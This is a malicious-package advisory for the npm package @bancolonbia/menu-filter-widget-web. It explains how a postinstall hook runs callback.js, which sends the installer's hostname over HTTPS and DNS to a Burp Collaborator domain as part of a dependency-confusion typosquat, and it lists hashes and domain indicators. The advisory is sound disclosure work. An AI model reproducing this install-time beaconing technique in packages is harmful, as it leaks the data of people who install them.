MAL-2026-5344
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@bancolonbia/menu-filter-widget-web/MAL-2026-5344.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5344
- Published
- 2026-06-09T09:20:38Z
- Modified
- 2026-06-09T21:01:33.341652429Z
- Summary
- Malicious code in @bancolonbia/menu-filter-widget-web (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (76511e7873dc4a76b8447f91807e48289877ee612cd0d94526206390bbda7f3e)
package.json declares
scripts.postinstall: node./callback.js, which fires automatically onnpm install. callback.js reads the installer's hostname and transmits it to a hardcoded Burp Collaborator domain (3y294ed4dfq501wnmdvbakcnwe25qvek.oastify.com) via two channels: an HTTPS GET to/<token>/<encodeURIComponent(host)>and a DNS lookup against a subdomain encoding the same token + hostname. The package self-describes as an "authorized security research PoC" but is published under the@bancolonbiascope (a likely typosquat of the Bancolombia corporate namespace), matching the classic dependency-confusion shape: a private-looking scoped name registered publicly so a misconfigured internal build resolves to this package and beacons victim identity to the researcher/attacker. Whether or not the operator is authorized by Bancolombia, any third party who installs this package has their hostname exfiltrated to an attacker-controlled Collaborator endpoint without consent.Source: ossf-package-analysis (fff12ed8f9f042d996b7c1167a9987b941eedcdedd7dbc2065579c4394e5b8b6)
The OpenSSF Package Analysis project identified '@bancolonbia/menu-filter-widget-web' @ 0.0.1 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- Database specific
{ "malicious-packages-origins": [ { "versions": [ "0.0.1" ], "sha256": "fff12ed8f9f042d996b7c1167a9987b941eedcdedd7dbc2065579c4394e5b8b6", "source": "ossf-package-analysis", "modified_time": "2026-06-09T09:20:38Z", "import_time": "2026-06-09T10:41:56.224884127Z" }, { "id": "IN-MAL-2026-005240", "import_time": "2026-06-09T20:45:58.996454307Z", "sha256": "3cca61c689abd692e18d4d07a8daed2b9e6d0b27348a20804f6422ffc1cce978", "source": "amazon-inspector", "modified_time": "2026-06-09T20:43:20Z", "versions": [ "0.0.1" ] }, { "id": "IN-MAL-2026-005239", "import_time": "2026-06-09T20:45:58.783658545Z", "sha256": "76511e7873dc4a76b8447f91807e48289877ee612cd0d94526206390bbda7f3e", "source": "amazon-inspector", "modified_time": "2026-06-09T20:43:20Z", "versions": [ "0.0.1" ] } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- OpenSSF: Package Analysis - FINDER
-
Affected packages
npm / @bancolonbia/menu-filter-widget-web
Package
- Name
- @bancolonbia/menu-filter-widget-web
- View open source insights on deps.dev
- Purl
- pkg:npm/%40bancolonbia%2Fmenu-filter-widget-web
Database specific
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@bancolonbia/menu-filter-widget-web/MAL-2026-5344.json"
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
indicators
{
"evidence_files": [
{
"path": "callback.js",
"sha256": "a1796ad3ed640844791551a0cfc9aabe691ec7ffe3431212c70e3c061254260b",
"tlsh": "b601c2fe06c4c73c594035c1e156543ae1abf244718699f0b46f321243e657626734f9"
},
{
"path": "package.json",
"sha256": "43e2aea1b070a51a39ac3ee0be364a3160786de0d3b0f3dc37e866d2445f5c00",
"tlsh": "30d0a7b05d0346773cd1ff9b0932429e5578cf197649852d19f16364846a9f4417136d"
}
],
"package_integrity": [
{
"filename": "menu-filter-widget-web-0.0.1.tgz",
"hashes": {
"sha512_sri": "sha512-D3bjH6oQbez4IFEq0UDAnAHVJtHwy8EQRexa0wGsDEGT0b1DU3vmFaHvhFFY8lgbvWtjbvINdKZYD3WmYR1Usw==",
"sha1": "46e98db4f946069b86db6c0c0eb9b02151f62c1a"
}
}
],
"domains": [
"3y294ed4dfq501wnmdvbakcnwe25qvek.oastify.com",
"poc-widget-001.scan-85faf31ba8d1.3y294ed4dfq501wnmdvbakcnwe25qvek.oastify.com"
]
}